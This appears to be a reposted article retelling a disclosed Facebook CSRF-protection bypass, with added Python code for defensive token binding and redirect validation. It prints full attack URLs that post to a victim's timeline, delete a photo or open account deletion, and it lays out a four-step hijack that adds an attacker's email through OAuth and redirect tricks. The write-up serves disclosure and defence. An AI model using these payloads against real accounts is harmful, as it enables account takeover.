How to bypass Facebook CSRF protection mechanism to realize account hijacking

2025-01-22 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article explains how the Facebook CSRF protection mechanism could be bypassed to achieve account hijacking. The content is concise and easy to understand, and I hope the detailed walkthrough gives you something useful.

The vulnerability shared today is a bypass of Facebook's CSRF protection mechanism: it allowed an attacker to send requests carrying a valid CSRF token to any endpoint of Facebook's products on behalf of a user, leading to account hijacking. In some scenarios the attacker could construct a malicious URL and lure a victim into clicking it, which was enough to trigger the vulnerability and take over the Facebook account.

Vulnerability description

The vulnerable Facebook endpoint I found is:

https://www.facebook.com/comet/dialog_DONOTUSE/?url=XXXX

Here XXXX can be set to any Facebook path, with parameters, and the endpoint will issue a POST request to it. The anti-CSRF token fb_dtsg is generated automatically by Facebook and added to the body of that request.

For the attacker it is therefore entirely possible to construct a URL and convince the victim to click it: the vulnerable endpoint calls other Facebook service endpoints on the victim's behalf, includes both the request parameters and the anti-CSRF token fb_dtsg, and finally completes the POST request to the target endpoint.

Using the vulnerable endpoint above, once the target victim visits a constructed URL the attacker can perform a variety of operations. For example:

Post to the timeline: https://www.facebook.com/comet/dialog_DONOTUSE/?url=/api/graphql/%3fdoc_id=1740513229408093%26variables={"input":{"actor_id":{TARGET_ID},"client_mutation_id":"1","source":"WWW","audience":{"web_privacyx":"REDACTED"},"message":{"text":"TEXT", "ranges": []}

Delete the profile photo: https://www.facebook.com/comet/dialog_DONOTUSE/?url=/profile/picture/remove_picture/%3fdelete_from_album=1%26profile_id={TARGET_ID}

Trick the victim into deleting his own account by changing the language parameter "locale": https://www.facebook.com/comet/dialog_DONOTUSE/?url=/help/delete_account/dialog/%3f__asyncDialog=0%26locale=fr_FR

This last operation pops up a password confirmation box; as soon as the victim enters the password and confirms, his own account is deleted.
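The root cause described above is that the dialog endpoint attaches the session's anti-CSRF token to a POST whose target is chosen by the caller, so the token no longer says anything about what the user actually intended. One defensive design that removes this class of relay is to bind each token to the action path it authorizes, so a token minted for one endpoint fails verification at any other. The following Python is an added, constructed illustration of that design; it is not Facebook's code and not how fb_dtsg is implemented. The function names, DEMO_SECRET and the sample paths are assumptions for the demo (the two Facebook paths are the ones named in the article).

```python
import hashlib
import hmac
from urllib.parse import unquote, urlsplit

# Constructed per-session secret. In a real deployment it lives in the
# server-side session store and is never sent to the browser.
DEMO_SECRET = b"constructed-demo-session-secret"


def normalize_action(path):
    """Canonical form of the action a token covers: percent-decode until the
    string is stable (so '/x/%3fa=1' and '/x/?a=1' agree), drop the query,
    lower-case, and strip the trailing slash."""
    prev = None
    while path != prev:
        prev, path = path, unquote(path)
    return urlsplit(path).path.lower().rstrip("/") or "/"


def mint_token(session_secret, action_path):
    """Token = HMAC(session secret, canonical action path). The page that
    renders a form posting to /profile/picture/remove_picture/ embeds a
    token minted for exactly that path and nothing else."""
    msg = normalize_action(action_path).encode("utf-8")
    return hmac.new(session_secret, msg, hashlib.sha256).hexdigest()


def verify_token(session_secret, action_path, token):
    """Constant-time comparison against the token expected for this path."""
    expected = mint_token(session_secret, action_path)
    return hmac.compare_digest(expected, token)


def handle_post(session_secret, request_path, form):
    """The check a state-changing endpoint runs before acting. `form` is the
    decoded POST body; the field name mirrors the article's fb_dtsg.
    Returns an HTTP status code."""
    if not verify_token(session_secret, request_path, form.get("fb_dtsg", "")):
        return 403
    return 200


def relay_demo(session_secret):
    """Model of the flawed relay: a token minted for the dialog endpoint is
    forwarded unchanged to a caller-chosen target. With action binding the
    target endpoint rejects it, while a properly minted token still works."""
    relayed = mint_token(session_secret, "/comet/dialog_DONOTUSE/")
    target = "/profile/picture/remove_picture/"
    return {
        "relayed_to_remove_picture": handle_post(
            session_secret, target, {"fb_dtsg": relayed}),
        "legitimate_remove_picture": handle_post(
            session_secret, target, {"fb_dtsg": mint_token(session_secret, target)}),
    }


if __name__ == "__main__":
    print(relay_demo(DEMO_SECRET))
```

Binding the token to the action is defence in depth: the primary fix for an endpoint like this is still to stop accepting an arbitrary caller-supplied target, but with bound tokens a relay of this shape yields nothing reusable even if such an endpoint slips through review.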

Analysis on the possibility of account hijacking

To achieve account hijacking, a new email address or mobile number has to be added to the victim's account. The problem is that the victim would have to visit two separate URLs: one to add the email address or phone number, and one to confirm the operation. The "normal" endpoint used to add an email address or phone number has no "next" parameter for redirecting the user after a successful addition, so to solve this I needed to find an endpoint that does have a "next" parameter, which would let me hijack the account with a single URL.

Step 1: the victim is made to authorize the attacker's app. During this process the request is redirected to https://www.facebook.com/v3.2/dialog/oauth and then automatically on to web content or a website constructed by the attacker, with the access_token parameter attached. The access_token carries the scopes the app is allowed to access, and because /ajax/appcenter/redirect_to_app performs the authorization, no user interaction is required here.

Send this built URL link to the target victim user:

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/ajax/appcenter/redirect_to_app%3fapp_id={ATTACKER_APP}%26ref=appcenter_top_grossing%26redirect_uri=https%3a//www.facebook.com/v3.2/dialog/oauth%3fresponse_type%3dtoken%26client_id%3d{ATTACKER_APP}%26redirect_uri%3d{DOUBLE_URL_ENCODED_LINK}%26scope%3d&preview=0&fbs=125&sentence_id&gift_game=0&scopes[0]=email&gdpv4_source=dialog

This step serves two purposes:

First, the /v3.2/dialog/oauth endpoint is used to bypass Facebook's redirect protection on the "next" parameter. Besides the linkshim protection against malicious outbound links, Facebook checks the "next" parameter in order to block some malicious redirect attempts; a "next" value pointing at the facebook.com OAuth dialog passes that check, and the dialog then redirects onward to the attacker's redirect_uri.

Second, the token received in this step identifies each victim, which later makes it possible to match the confirmation code to the specific user.
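The bypass of the "next" check above works because the check accepts a local path that is itself a redirector, and because the payload is double percent-encoded so that each hop sees a different string. As an added illustration (constructed; not Facebook's code), the Python below shows a "next" validator of the kind a defender would want: it decodes until the value is stable so double-encoded input is judged in the form the server will eventually act on, rejects anything that can carry a scheme or host, refuses known redirecting endpoints even though they are local, and only then checks an allowlist. The allowlist contents and the REDIRECTING_PATHS set are assumptions for the demo; the two paths in that set are the ones named in this article.

```python
from urllib.parse import urlsplit, unquote

# Constructed allowlist of local pages a post-action redirect may land on.
ALLOWED_NEXT_PATHS = {"/", "/home.php", "/settings"}

# Local endpoints that themselves redirect based on caller input (the two
# paths named in the article). A "next" that lands on one of them re-creates
# an open redirect one hop later, so they are refused even though they are
# same-site.
REDIRECTING_PATHS = {"/v3.2/dialog/oauth", "/ajax/appcenter/redirect_to_app"}


def fully_decode(value, max_layers=5):
    """Percent-decode until the string stops changing, so that '%253f' and
    '%3f' are both seen as '?'. An implausible number of layers is treated
    as hostile rather than decoded further."""
    for _ in range(max_layers):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many percent-encoding layers")


def validate_next(raw_next):
    """Return a safe site-relative 'next' target, or raise ValueError."""
    if not raw_next:
        return "/"
    decoded = fully_decode(raw_next)
    # Backslashes and control characters are parsed inconsistently by
    # browsers and servers; refuse rather than guess how they resolve.
    if "\\" in decoded or any(ord(c) < 0x20 for c in decoded):
        raise ValueError("unsafe characters in next")
    parts = urlsplit(decoded)
    # Anything with a scheme or authority ('https://h', '//h', 'javascript:')
    # can leave the site; so can a value that is not rooted at '/'.
    if parts.scheme or parts.netloc or not decoded.startswith("/"):
        raise ValueError("next must be a site-relative path")
    path = parts.path.rstrip("/") or "/"
    if path in REDIRECTING_PATHS:
        raise ValueError("next points at a redirecting endpoint")
    if path not in ALLOWED_NEXT_PATHS:
        raise ValueError("next is not an allowlisted page")
    return decoded


def is_safe_next(raw_next):
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        validate_next(raw_next)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed samples, including the double-encoded shape used in the article.
    samples = [
        "/settings?section=email",
        "/v3.2/dialog/oauth%253fresponse_type%253dtoken%2526redirect_uri%253dhttps%253a//attacker.example",
        "//attacker.example/",
        "https://attacker.example/",
        "/profile/picture/remove_picture/",
    ]
    for s in samples:
        verdict = "accept" if is_safe_next(s) else "reject"
        print(f"{s[:60]:<60} -> {verdict}")
```

The order of the checks matters: the allowlist comparison is only meaningful once the value has been reduced to the single form the browser will actually follow, which is why decoding and the scheme/authority rejection come first.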

Step 2: the attacker's website receives the token from the victim's visit, generates an email address on the fly, and redirects the victim to the following link:

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/add_contactpoint/dialog/submit/%3fcontactpoint={EMAIL_CHOSEN}%26next=/v3.2/dialog/oauth%253fresponse_type%253dtoken%2526client_id%253d{ATTACKER_APP}%2526redirect_uri%253d{DOUBLE_URL_ENCODED_LINK}

The link performs the following actions:

First, it uses the /add_contactpoint/dialog/submit/ function to add an attacker-controlled email address to the victim's account (no password confirmation is required), and then it redirects to the endpoint the attacker chose in the "next" parameter, namely:

/v3.2/dialog/oauth?response_type=token&client_id={ATTACKER_APP}&redirect_uri={ATTACKER_DOMAIN}

As a result, the victim is redirected to ATTACKER_DOMAIN with an access_token included in the request.

Step 3: after the attacker's website receives the access_token, it extracts the victim's user ID and then looks in the attacker's mailbox for the confirmation link that Facebook sends for the newly added address; the link contains a CODE and a HASH generated by Facebook.

For the attacker this method is very simple. If, instead, the victim is to be redirected to https://www.facebook.com/settings?section=email to add the email address, the /confirm_code/dialog/submit/ function must be used for the confirmation; it also takes a "next" parameter, which automatically redirects the victim to the Facebook home page once the confirmation is done.

Step 4: now that a new mailbox has been added to the victim's account, the attacker can reset the password to hijack the account.

The verification process described above is lengthy, but the attack itself is instantaneous, which makes it very dangerous. The vulnerability does not have to be aimed at specific users: as long as the execution script is deployed on the attacker-hosted website, any Facebook user who visits the link constructed in step 1 can be caught.

The above is how the Facebook CSRF protection mechanism could be bypassed to achieve account hijacking. Have you learned any new knowledge or skills? If you want to learn more or enrich your knowledge, you are welcome to follow the industry information channel.
